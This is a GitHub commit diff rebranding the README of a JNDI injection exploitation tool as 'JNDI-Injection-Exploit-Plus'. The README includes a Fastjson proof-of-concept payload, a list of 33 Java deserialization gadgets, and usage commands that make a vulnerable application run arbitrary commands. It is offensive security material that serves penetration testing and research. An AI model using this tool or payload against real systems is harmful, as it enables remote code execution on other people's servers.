cckuailong
diff --git a/‎LICENSE‎
Lines changed: 1 addition & 1 deletion b/‎LICENSE‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎README-CN.md‎
Lines changed: 0 additions & 95 deletions b/‎README-CN.md‎
Lines changed: 0 additions & 95 deletions
diff --git a/‎README.md‎
Lines changed: 74 additions & 27 deletions b/‎README.md‎
Lines changed: 74 additions & 27 deletions
diff --git a/‎img/1.png‎
575 KB b/‎img/1.png‎
575 KB
diff --git a/‎img/2.png‎
878 KB b/‎img/2.png‎
878 KB
@@ -1,6 +1,6 @@
 MIT License
 
-Copyright (c) 2019 welk1n
+Copyright (c) 2022 cckuailong
 
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 
@@ -1,14 +1,8 @@
-# JNDI-Injection-Exploit
-
-[Materials about JNDI Injection](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf)
-
-[中文文档](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md)
-
-[相关文章](https://www.cnblogs.com/Welk1n/p/11066397.html)
+# JNDI-Injection-Exploit-Plus
 
 ## Description
 
-JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on  [marshals](https://github.com/mbechler/marshalsec) and modified further to link with HTTP server. 
+JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. 
 
 Using this tool allows you get JNDI links, you can insert these links into your **POC** to test vulnerability. 
 
@@ -18,18 +12,72 @@ For example, this is a Fastjson vul-poc:
 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}
 ```
 
-We can replace  "rmi://127.0.0.1:1099/Object" with the link generated by JNDI-Injection-Exploit to test vulnerability. 
-
-## Disclaimer
-
-All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.
+We can replace  "rmi://127.0.0.1:1099/Object" with the link generated by JNDI-Injection-Exploit-Plus to test vulnerability. 
+
+## More than [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
+
+[JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit) is a great tool, this is the plus version of it.
+
+### What's more
+
+#### 1. More JNDI Remote Reference Gadget: (total: 3)
+- Support JDK 6/7/8
+#### 2. More JNDI Local Reference Gadget: (total: 4)
+
+Payload | author | dependencies
+--- | --- | --- 
+Tomcat 8+ or SpringBoot | @welk1n | trustURLCodebase is false but have Tomcat 8+ or SpringBoot 1.2.x+ in classpath
+Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
+Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
+Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
+
+#### 3. Deserailization Gadget (total: 33)
+
+P.S. More Gadgets than ysoserial, welcome to PR more! ^_^
+
+payload | author | dependencies 
+------ | -------- | ------ 
+AspectJWeaver       |@Jang                       |aspectjweaver:1.9.2, commons-collections:3.2.2
+BeanShell1          |@pwntester, @cschneider4711 |bsh:2.0b5
+C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-java:0.2.11
+Click1              |@artsploit                  |click-nodeps:2.3.0, javax.servlet-api:3.1.0
+Clojure             |@JackOfMostTrades           |clojure:1.8.0
+CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2
+CommonsBeanutils2   |@cckuailong                 |commons-beanutils:1.9.2
+CommonsCollections1 |@frohoff                    |commons-collections:3.1
+CommonsCollections2 |@frohoff                    |commons-collections4:4.0
+CommonsCollections3 |@frohoff                    |commons-collections:3.1
+CommonsCollections4 |@frohoff                    |commons-collections4:4.0
+CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
+CommonsCollections6 |@matthias_kaiser            |commons-collections:3.1
+CommonsCollections7 |@scristalli, @hanyrax, @EdoardoVignati |commons-collections:3.1
+FileUpload1         |@mbechler                   |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
+Groovy1             |@frohoff                    |groovy:2.3.9
+Hibernate1          |@mbechler|
+Hibernate2          |@mbechler|
+JBossInterceptors1  |@matthias_kaiser            |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+JSON1               |@mbechler                   |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
+JavassistWeld1      |@matthias_kaiser            |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+Jython1             |@pwntester, @cschneider4711 |jython-standalone:2.5.2
+MozillaRhino1       |@matthias_kaiser            |js:1.7R2
+MozillaRhino2       |@_tint0                     |js:1.7R2
+Myfaces1            |@mbechler|
+Myfaces2            |@mbechler|
+ROME1               |@mbechler                   |rome:1.0
+ROME2               |@firebasky                  |rome:1.0
+Spring1             |@frohoff                    |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
+Spring2             |@mbechler                   |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
+URLDNS              |@gebl|						 |jre only vuln detect
+Vaadin1             |@kai_ullrich                |vaadin-server:7.7.14, vaadin-shared:7.7.14
+Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
+WildFly1            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
 
 ## Usage
 
  Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -46,7 +94,7 @@ Points for attention:
 
 - make sure your server's ports (**1099**, **1389**, **8180**) are available .
 
-  or you can change the default port in the run.ServerStart class line 26~28.
+  or you can change the default port in the run.ServerStart class.
 
 - your command is passed to **Runtime.getRuntime().exec()** as parameters, 
 
@@ -61,53 +109,52 @@ Points for attention:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
 
-   ![image-20191018154346759](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/1.png)
+   ![](./img/1.png)
 
-2. Assume that we inject the JNDI links like rmi://ADDRESS/jfxllc generated in step 1 to a vulnerable application which can be attacked by JNDI injection.
+2. Assume that we inject the JNDI links like rmi://ADDRESS/remoteExploit8 generated in step 1 to a vulnerable application which can be attacked by JNDI injection.
 
    In this example, it looks like this:
 
    ```java
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
-       ctx.lookup("rmi://127.0.0.1/fgf4fp");
+       ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
    }
    ```
 
    then when we run this code, the command will be executed ,
 
    and the log will be printed in shell:
 
-   ![image-20191018154515787](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/2.png)
-
+   ![](./img/2.png)
 
+For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuailong/Test-JNDI-Injection-Exploit-Plus)
 
 ## Installation
 
 We can select one of the two methods to get the jar.
 
-1. Download the latest jar from [Realease](https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar).
+1. Download the latest jar from [Realease](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/releases).
 
 2. Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+).
 
    ```shell
-   $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
+   $ git clone https://github.com/cckuailong/JNDI-Injection-Exploit-Plus.git
    ```
 
    ```shell
-   $ cd JNDI-Injection-Exploit
+   $ cd JNDI-Injection-Exploit-Plus
    ```
 
    ```shell
    $ mvn clean package -DskipTests
    ```
 
-## To do
+## Disclaimer
 
-- (**Done**)Combine this project and [JNDI-Injection-Bypass](https://github.com/welk1n/JNDI-Injection-Bypass) to generate workable links when **trustURLCodebase is false** in higher versions of JDK by default.
-- … ...
+All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.